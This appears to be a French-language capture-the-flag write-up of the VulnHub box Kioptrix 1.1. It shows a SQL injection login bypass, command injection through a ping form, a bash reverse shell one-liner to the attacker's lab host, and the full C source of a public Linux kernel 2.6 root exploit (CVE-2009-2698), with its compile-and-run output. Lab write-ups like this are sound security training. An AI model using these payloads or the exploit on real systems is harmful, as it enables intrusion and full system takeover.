---
layout: default
title: "Kioptrix 1.1 (#2)"
tags: vulnhub
---

# box [Kioptrix 1.1 (#2)](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/)

Découverte de l’@ IP de la machine cible
<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image1.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image2.png" width="100%" height="50%">
10.0.2.1 => host Debian pour dhcp

10.0.2.13 => cible

10.0.2.14 => kali (host)

Nmap -sC -sV 10.0.2.13

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image3.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image4.png" width="100%" height="50%">

80/tcp & 443/tcp =>http & https Apache = server web

3306/tcp => MySQL = BDD

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image5.png" width="100%" height="50%">
Page web héberger sur la machine, formulaire de login, étant donne le BDD aussi héberge sur le serveur, on peut tenter une injection SQL basic username : ***Admin’ or 1=1 #*** password : pas d’importance

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image6.png" width="100%" height="50%">

L’injection à marcher on est donc passé à une autre page ou il faut rentre une IP pour qu’elle soit ping, on peut faire le test avec une IP localhost de la machine distance ex : 127.0.0.1

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image7.png" width="100%" height="50%">
On est redirigé ver une troisième page avec le retour du ping, on peut donc essayer de voir si l’@IP est contrôler avec l’aide de **;** pour exécuter une deuxième commande a la suite comme par exemple id

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image8.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image9.png" width="100%" height="50%">
On peut donc en dédorure que aucun traitement est fait sur le champ input de la page web, on peut aussi voir que l’utilisateur qui exécute la commande est **apache**.

À la vue de faite que l’on peut exécuter n’importe qu’elle commande que l’utilisateur apache peut exécuter on peut essayer d’obtenir une revshell avec la commande

```bash
127.0.0.1 ; bash -i >& /dev/tcp/10.0.2.10/1234 0>&1
```

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image10.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image11.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image12.png" width="100%" height="50%">
Écoute sur le port 1234 sur notre machine a l’aide de netcat

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image13.png" width="100%" height="50%">
Le serveur se connecte bien sur notre machine avec un bash

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image14.png" width="100%" height="50%">
Récolte d’information sur la machine utilisateur, os et kernel

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image15.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image16.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image17.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image18.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image19.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image20.png" width="100%" height="50%">
On peut donc faire une recherche sur exploit-db.com pour les failles sur CentOS 4.5 avec un kernel 2.6.9-55.EL

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image21.png" width="100%" height="50%">
[https://www.exploit-db.com/exploits/9542](https://www.exploit-db.com/exploits/9542)

```c
Code de l’exploite

/*

- *
- * 0x82-CVE-2009-2698
- * Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
- *
- * Tested White Box 4(2.6.9-5.ELsmp),
- * CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
- * Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
- * Fedora Core 6(2.6.18-1.2798.fc6).
- *
- * --
- * Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
- * Thankful to them.
- *
- * --
- * bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
- * sh-3.1# id
- * uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
- * sh-3.1#
- * --
- * exploit by <p0c73n1(at)gmail(dot)com>.
*/

#include <stdio.h>

#include <unistd.h>

#include <string.h>

#include <sys/socket.h>

#include <sys/mman.h>

#include <fcntl.h>

#include <sys/personality.h>

unsigned int uid, gid;

void get_root_uid(unsigned *task)

{

unsigned *addr=task;

while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){

addr++;

}

addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */

addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */

return;

}

void exploit();

void kernel_code()

{

asm("exploit:\n"

"push %eax\n"

"movl $0xfffff000,%eax\n"

"andl %esp,%eax\n"

"pushl (%eax)\n"

"call get_root_uid\n"

"addl $4,%esp\n"

"popl %eax\n");

return;

}

void *kernel=kernel_code;

int main(int argc, char **argv)

{

int fd=0;

char buf[1024];

struct sockaddr x0x;

void *zero_page;

uid=getuid();

gid=getgid();

if(uid==0){

fprintf(stderr,"[-] check ur uid\n");

return -1;

}

if(personality(0xffffffff)==PER_SVR4){

if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){

perror("[-] mprotect()");

return -1;

}

}

else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){

perror("[-] mmap()");

return -1;

}

- (unsigned long *)0x0=0x90909090;
- (char *)0x00000004=0x90; /* +1 */
- (char *)0x00000005=0xff;
- (char *)0x00000006=0x25;
- (unsigned long *)0x00000007=(unsigned long)&kernel;
- (char *)0x0000000b=0xc3;

if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){

perror("[-] socket()");

return -1;

}

x0x.sa_family=AF_UNSPEC;

memset(x0x.sa_data,0x82,14);

memset((char *)buf,0,sizeof(buf));

sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));

sendto(fd,buf,1024,0,&x0x,sizeof(x0x));

if(getuid()==uid){

printf("[-] exploit failed, try again\n");

return -1;

}

close(fd);

execl("/bin/sh","sh","-i",NULL);

return 0;

}

/* eoc */

// milw0rm.com [2009-08-31]
```

création d’un serveur web minimaliste pour uploade le code sur la machine vulnérable

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image22.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image23.png" width="100%" height="50%">
Tentative de création de ficher dans le dossier courant ***touch test*** => pas le droit d’écriture

`cd /tmp` => charment de réapitoie courant pour le /tmp

Téléchargent du code de l’exploite via `wget`

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image24.png" width="100%" height="50%">

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image25.png" width="100%" height="50%">
Complication et exécution de l’exploite

<img src="{{ site.baseurl }}//assets/img/boxKioptrix/image26.png" width="100%" height="50%">



```console
bash-3.00$ gcc 9542.c -o 9542
9542.c:109:28: warning: no newline at end of faile
bash-3.00$ ./9542
sh: no job control in this shell
sh-3.00# id
uid=0(root) git=0(root) groups=48(apache)
sh-3.00#
```
Machine rooted
